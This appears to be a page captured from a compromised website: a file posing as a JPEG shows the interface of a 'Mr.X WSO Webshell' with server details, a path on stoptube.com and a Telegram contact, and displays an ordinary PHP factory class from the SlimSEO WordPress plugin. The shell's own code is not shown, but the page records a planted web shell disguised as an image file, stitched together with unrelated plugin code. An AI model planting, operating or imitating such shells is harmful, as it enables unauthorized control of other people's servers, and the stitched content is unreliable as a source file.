����JFIF���������
| Attention: Uname: Php: Hdd: Cwd: | Mr.X WSO Webshell! - Personal WEB SHELL Mr.X BYPASS! V2.5 Telegram: @jackleet 5.3.29 Safe mode: OFF Datetime: 2026-04-10 03:35:24 1999.30 GB Free: 63.56 GB (3%) /home/httpd/html/stoptube.com/ drwxr-xr-x [ root ] [ home ] Text | Server IP: 127.0.0.54 Client IP: 216.73.216.53 |
| [ Files ] | [ Logout ] |
|---|
<?php
namespace SlimSEO\Migration;
class Factory {
public static function make( string $source ): ?Sources\Source {
switch ( $source ) {
case 'yoast':
return new Sources\Yoast;
case 'aioseo':
return new Sources\AIOSEO;
case 'seo-framework':
return new Sources\SEOFramework;
case 'rank-math':
return new Sources\RankMath;
case 'seopress':
return new Sources\SEOPress;
case 'redirection':
return new Sources\Redirection;
case '301-redirects':
return new Sources\Redirects301;
}
return null;
}
}